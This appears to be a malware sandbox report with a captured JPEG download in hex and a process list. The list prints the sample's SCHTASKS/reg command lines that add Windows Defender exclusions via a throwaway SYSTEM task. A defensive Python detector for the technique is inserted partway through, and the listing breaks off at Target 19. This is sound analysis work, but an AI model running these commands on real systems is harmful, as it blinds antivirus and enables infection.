                                                    Date: Mon, 06 Jan 2025 03:44:08 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 4859125
                                                    Connection: close
                                                    x-oss-request-id: 677B51886FB42B383872C3C2
                                                    Accept-Ranges: bytes
                                                    ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                    Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                    x-oss-object-type: Normal
                                                    x-oss-hash-crc64ecma: 9060732723227198118
                                                    x-oss-storage-class: Standard
                                                    x-oss-ec: 0048-00000105
                                                    Content-Disposition: attachment
                                                    x-oss-force-download: true
                                                    Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                    x-oss-server-time: 12
                                                    2025-01-06 03:44:08 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                    Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                    Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                    Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                    2025-01-06 03:44:08 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                    Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                    Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                    Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                    2025-01-06 03:44:08 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                    Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                    2025-01-06 03:44:08 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                    Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                    2025-01-06 03:44:08 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                    Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ



                                                    Target ID:0
                                                    Start time:22:42:03
                                                    Start date:05/01/2025
                                                    Path:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
                                                    Imagebase:0x140000000
                                                    File size:30'885'376 bytes
                                                    MD5 hash:5B695FABFCD1DA54F7C193EF5F11EF6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:22:43:45
                                                    Start date:05/01/2025
                                                    Path:C:\Users\user\Documents\5oqa98.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Documents\5oqa98.exe
                                                    Imagebase:0x140000000
                                                    File size:133'136 bytes
                                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:22:43:47
                                                    Start date:05/01/2025
                                                    Path:C:\Users\user\Documents\5oqa98.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Documents\5oqa98.exe
                                                    Imagebase:0x140000000
                                                    File size:133'136 bytes
                                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:22:43:58
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true
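
The chain above (Targets 10 to 17) is one complete round of the Defender-exclusion technique: cmd.exe registers a one-shot task ("Task1", /SC ONCE, /RU SYSTEM, /RL HIGHEST) whose action is a reg add against HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, runs it immediately with SCHTASKS /Run, then removes it with SCHTASKS /Delete, so the exclusion is written by a SYSTEM-level reg.exe and no task remains on the host afterwards. The same round is repeated in the following targets for C:\Users, C:\Program Files (x86) and the user's Documents folder. The script below is an added detection example written for this listing; it is not part of the Joe Sandbox report or of the sample. It parses process-creation command lines (the sample events are constructed from the command lines in this report plus one made-up benign task) and flags the exclusion write itself, the privileged task that carries it, and the create/run/delete pattern. The ten-second window, the finding names and the helper names are assumptions.

```python
"""Detect Defender-exclusion tampering through short-lived privileged scheduled tasks.

Input: process-creation events as (start time, image path, command line), e.g. from
Sysmon Event ID 1 or a sandbox process list. SAMPLE_EVENTS below is constructed from
the command lines in this report; the detection window and names are assumptions.
"""
import re
from datetime import datetime, timedelta

# Defender keeps each exclusion as a value name (DWORD data 0) under one of these subkeys.
EXCLUSION_KEY = re.compile(
    r"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\(Paths|Extensions|Processes)",
    re.IGNORECASE)
# '/v "value"', or '/v \"value\"' when the reg command is nested inside a /TR string.
REG_VALUE = re.compile(r'/v\s+\\?"(.+?)\\?"', re.IGNORECASE)
TASK_NAME = re.compile(r'/TN\s+"?([^"\s]+)"?', re.IGNORECASE)
RUN_AS = re.compile(r'/RU\s+"?([^"\s]+)"?', re.IGNORECASE)
RUN_LEVEL = re.compile(r"/RL\s+(\S+)", re.IGNORECASE)
SCHTASKS_VERB = re.compile(r"schtasks(?:\.exe)?\s+/(create|run|delete)\b", re.IGNORECASE)
REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\b", re.IGNORECASE)


def exclusion_target(cmdline):
    """Return (subkey, excluded value) if cmdline carries a 'reg add' on a Defender exclusions key."""
    key = EXCLUSION_KEY.search(cmdline)
    value = REG_VALUE.search(cmdline)
    if REG_ADD.search(cmdline) and key and value:
        return key.group(1).capitalize(), value.group(1)
    return None


def analyze(events, window=timedelta(seconds=10)):
    """Return a list of (finding, detail, detail) tuples for the given events, in event order."""
    findings = []
    tasks = {}  # task name -> {verb: first timestamp seen}
    for time_str, image, cmdline in events:
        ts = datetime.strptime(time_str, "%H:%M:%S")
        exe = image.rsplit("\\", 1)[-1].lower()

        # The write itself. Only reg.exe is counted, so the parent cmd.exe lines that
        # carry the same text do not produce duplicate findings.
        if exe == "reg.exe":
            hit = exclusion_target(cmdline)
            if hit:
                findings.append(("defender_exclusion_added", hit[0], hit[1]))
            continue

        verb = SCHTASKS_VERB.search(cmdline)
        if exe != "schtasks.exe" or not verb:
            continue
        verb = verb.group(1).lower()
        name_m = TASK_NAME.search(cmdline)
        name = name_m.group(1) if name_m else "?"
        seq = tasks.setdefault(name, {})
        seq.setdefault(verb, ts)

        # A task registered to run as SYSTEM (or at the highest run level) whose action is
        # the exclusion write: this is how the sample reaches an HKLM key it could not touch
        # under a plain token. Only the literal "SYSTEM" spelling is matched (assumption).
        if verb == "create":
            ru = RUN_AS.search(cmdline)
            rl = RUN_LEVEL.search(cmdline)
            privileged = (ru is not None and ru.group(1).upper() == "SYSTEM") or \
                         (rl is not None and rl.group(1).upper() == "HIGHEST")
            payload = exclusion_target(cmdline)
            if privileged and payload:
                findings.append(("privileged_task_adds_exclusion", name, payload[1]))

        # Create -> Run -> Delete of the same task within `window`: a throwaway launcher,
        # not persistence, so it never appears in a later task inventory.
        if {"create", "run", "delete"}.issubset(seq) and seq["delete"] - seq["create"] <= window:
            age = int((seq["delete"] - seq["create"]).total_seconds())
            findings.append(("ephemeral_task", name, age))
            tasks.pop(name)  # the same task name is reused for the next round
    return findings


def excluded_paths(findings):
    """Values actually written to the exclusions keys, in the order they were written."""
    return [f[2] for f in findings if f[0] == "defender_exclusion_added"]


# Constructed from the command lines of Targets 10-17 and 18-25 in this report; the last
# entry is a made-up benign daily task, included to show that it is not flagged.
SAMPLE_EVENTS = [
    ("22:43:58", r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F'),
    ("22:43:58", r"C:\Windows\System32\schtasks.exe",
     r'SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"'),
    ("22:43:58", r"C:\Windows\System32\schtasks.exe", r'SCHTASKS /Run /TN "Task1"'),
    ("22:43:58", r"C:\Windows\System32\schtasks.exe", r'SCHTASKS /Delete /TN "Task1" /F'),
    ("22:43:58", r"C:\Windows\System32\reg.exe",
     r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f'),
    ("22:43:59", r"C:\Windows\System32\schtasks.exe",
     r'SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"'),
    ("22:43:59", r"C:\Windows\System32\schtasks.exe", r'SCHTASKS /Run /TN "Task1"'),
    ("22:43:59", r"C:\Windows\System32\schtasks.exe", r'SCHTASKS /Delete /TN "Task1" /F'),
    ("22:43:59", r"C:\Windows\System32\reg.exe",
     r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f'),
    ("22:45:00", r"C:\Windows\System32\schtasks.exe",
     r'SCHTASKS /Create /F /TN "VendorUpdate" /SC DAILY /ST 03:00 /TR "C:\Program Files\Vendor\update.exe"'),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(*finding)
```

Run against the two constructed rounds the script reports, per round, the privileged task that carries the write, the create/run/delete pair completing within the same second, and the reg.exe write itself; the benign VendorUpdate task produces nothing. On a live host the same write is visible as a new value name with DWORD data 0 under the Exclusions\Paths key, and in the ExclusionPath property returned by Get-MpPreference, which is the quickest check when triaging a machine that ran this sample.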

                                                    Target ID:18
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
